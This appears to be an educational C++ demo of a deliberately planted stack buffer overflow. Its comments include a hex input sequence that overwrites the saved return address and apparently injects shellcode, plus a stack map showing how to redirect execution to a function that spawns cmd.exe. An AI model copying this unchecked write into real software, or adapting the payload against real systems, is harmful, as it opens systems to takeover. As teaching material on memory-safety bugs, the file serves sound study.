#include <iostream>

using namespace std;

/// Demonstration target for the overflow in exploitMe(): nothing in this file
/// calls it, it only exists so a corrupted saved return address has somewhere
/// to land, and reaching it (a shell spawned via system()) is the observable
/// proof of control. system() lives in <cstdlib>, which this file relies on
/// <iostream> to pull in transitively — include it explicitly. The function's
/// compiled address recorded in the trailing comment belongs to one specific
/// build and will differ elsewhere.
void evilCode() {
  char str[] = "cmd.exe";
  system(str);
}
// Write index for exploitMe()'s buf. Kept at file scope, so it is
// zero-initialised and presumably stays off the overflowed stack frame
// (confirm). exploitMe() increments it for every value stored and never
// compares it against the array size.
int i = 0;
/// Deliberately vulnerable reader used for the stack-overflow demo.
/// Reads hex words from stdin into a 4-element stack array with no bounds
/// check, so the 5th and later values spill over the saved frame pointer and
/// return address (see the stack map at the end of the file). Always returns 0.
/// The addresses in the comments below come from one particular build
/// (presumably 32-bit Windows, given "cmd.exe"); they change with compiler,
/// flags or ASLR — confirm locally before relying on them.
int exploitMe() {
	// buf is at 0x0012ff28
	// exploit starts 12ff34
	// 6th number you enter clobbers return address
	// to hack:
	/*
1
2
3
4
5
12ff34
83ec8b55
565348ec
b87d8d57
000012b9
ccccb800
abf3cccc
47101ca1
f8458900
10200d8b
4d890047
f8558dfc
0baae852
c483002f
5b5e5f04
3b48c483
f65ee8ec
e58b0001
0
*/

	int buf[4];          // four slots; nothing below rejects indices >= 4
	int n = -1;          // loop sentinel: an input of 0 ends the read loop
	int j;
	// BUG (kept for the demo): %x expects an unsigned int, not a pointer.
	// %p is the correct, portable specifier for printing an address.
	printf("buf is at %x\n", &buf);
	buf[0] = 0xAA; buf[1] = 0xBB; buf[2] = 0xCC; buf[3] = 0x00;
	while (n != 0) {
		// scanf's return value is unchecked: on a parse failure n keeps its
		// previous value and the loop keeps storing it (and advancing i).
		scanf("%x", &n);
		// The store is indexed by the GLOBAL i with no `i < 4` guard — this is
		// the out-of-bounds stack write the file demonstrates. The real-world
		// fix is a bound before the store, e.g. `if (i >= 4) break;`, and a
		// stack-protector / non-executable-stack build to contain the fallout.
		buf[i++] = n;
	}

	printf("you entered ");
	// Echo everything that was stored, including any words written past buf.
	for (j=0; j<i; j++)
		printf("%x ", buf[j]);
	// Two reads before returning — presumably to swallow the pending newline
	// and wait for a keypress so the console stays open; confirm.
	getchar();
	getchar();
	return 0;
}

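/// Entry point for the overflow demo: prints where evilCode() lives, then
/// runs the vulnerable reader. Streaming a function pointer straight into
/// cout selects the bool overload and prints "1" rather than an address, so
/// the pointer is cast to void* first (a conditionally-supported cast that
/// the usual desktop toolchains accept). Returns 0.
int main() {
  cout << "evilCode() is at " << reinterpret_cast<void*>(&evilCode) << endl;
  exploitMe();
  return 0;
}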

/********

  stack:
12ff30: ret (saved value is 0x00401687 or 0x00401682)
12ff2c: ebp (saved value is 0x12ff80)
12fedc: [50h]
12fed8: ebx
12fed4: esi
12fed0: edi



esp before sub: 12ff2c
esp after  sub: 12fedc
buf:        0x0012ff1c
buf[5]:     0x0012ff30  <---- matches location of saved return address!


*(int *)0x12ff30=0x401580 returns to evilcode


  *******/